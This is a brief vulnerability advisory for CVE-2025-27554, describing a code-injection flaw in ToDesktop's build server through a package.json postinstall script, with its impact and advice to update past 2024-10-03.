CVE-2025-27554

Name of the Vulnerable Software and Affected Versions ToDesktop versions prior to 2024-10-03

Description The issue allows remote attackers to execute arbitrary commands on the build server, potentially reading secrets from the desktopify config.prod.json file and deploying updates to any app, via a postinstall script in package.json. No exploitation occurred. The vulnerability is related to improper control of generation of code, also known as 'Code Injection'.

Recommendations For ToDesktop versions prior to 2024-10-03, update to a version released on or after 2024-10-03 to prevent potential attacks. As a temporary workaround, consider restricting access to the postinstall script in package.json until a patch is available. Avoid using the vulnerable postinstall script in the affected package.json file until the issue is resolved.